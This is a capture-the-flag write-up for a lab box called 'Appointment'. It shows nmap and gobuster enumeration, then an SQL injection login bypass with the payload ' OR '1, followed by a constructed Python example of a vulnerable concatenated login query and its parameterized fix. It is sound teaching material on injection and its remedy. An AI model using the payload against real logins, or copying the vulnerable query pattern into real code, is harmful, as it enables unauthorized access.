Appointment

Resolution summary

  • Initial scan showed only port 80 open
  • The web page shows a login form; ran a gobuster scan to check for any other pages
  • While that was running, tried some common SQL injection payloads against the login
  • A simple injection worked and we got the flag

Improved skills

  • SQL Injection

Used tools

  • nmap
  • gobuster

Information Gathering

Nmap

### 10.129.25.237

| Port | State | Service | Version |
|------|-------|---------|---------|
| 80/tcp | open | http | Apache httpd 2.4.38 |


Enumeration

Port 80 - HTTP (Apache)

This is a web application, so let's start with gobuster to get a quick directory scan and see if we're missing anything.

Gobuster returned nothing beyond the static asset directories:

```
└─$ gobuster dir -u 10.129.25.237 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.25.237
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/03/13 20:25:48 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 315] [--> http://10.129.25.237/images/]
/css                  (Status: 301) [Size: 312] [--> http://10.129.25.237/css/]
/js                   (Status: 301) [Size: 311] [--> http://10.129.25.237/js/]
/vendor               (Status: 301) [Size: 315] [--> http://10.129.25.237/vendor/]
/fonts                (Status: 301) [Size: 314] [--> http://10.129.25.237/fonts/]
Progress: 87629 / 87665 (99.96%)
===============================================================
2023/03/13 20:34:06 Finished
===============================================================
```

Exploitation

SQL Injection

Ran a simple SQL injection, entering `' OR '1` in the username field; the password can be anything.
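To show why that single quote is enough, here is an added example (not the target's code) of a constructed SQLite login check that splices form input into the query, beside its parameterized fix. It assumes the WHERE clause compares the password before the username; because AND binds tighter than OR, with the opposite column order the same fragment would have to land in the last-compared field to take effect.

```python
import sqlite3

# Constructed in-memory users table standing in for the application's real
# database (assumption: one users table holding plaintext credentials).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'S3cret!')")
    return conn

def login_concatenated(conn, username, password):
    """Vulnerable: form input is concatenated straight into the SQL text."""
    query = ("SELECT username FROM users WHERE password = '" + password +
             "' AND username = '" + username + "'")
    # With username = "' OR '1" the query becomes
    #   ... WHERE password = 'x' AND username = '' OR '1'
    # which parses as (password = 'x' AND username = '') OR '1', and '1' is
    # true, so the first row matches whatever the password was.
    row = conn.execute(query).fetchone()
    return row[0] if row else None

def login_parameterized(conn, username, password):
    """Fixed: bound parameters, so the input is data and never SQL syntax."""
    query = "SELECT username FROM users WHERE password = ? AND username = ?"
    row = conn.execute(query, (password, username)).fetchone()
    return row[0] if row else None

PAYLOAD = "' OR '1"  # the fragment used in the write-up

def demo():
    """Run both versions with valid credentials and with the injection."""
    conn = make_db()
    return {
        "vuln_valid": login_concatenated(conn, "admin", "S3cret!"),
        "vuln_payload": login_concatenated(conn, PAYLOAD, "anything"),
        "fixed_valid": login_parameterized(conn, "admin", "S3cret!"),
        "fixed_payload": login_parameterized(conn, PAYLOAD, "anything"),
    }

if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The parameterized version still accepts the real credentials but returns no row for the injected username, which is the fix to look for in the application's login handler.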

Trophy & Loot

flag

Your flag is: e3d07****************6f42e9672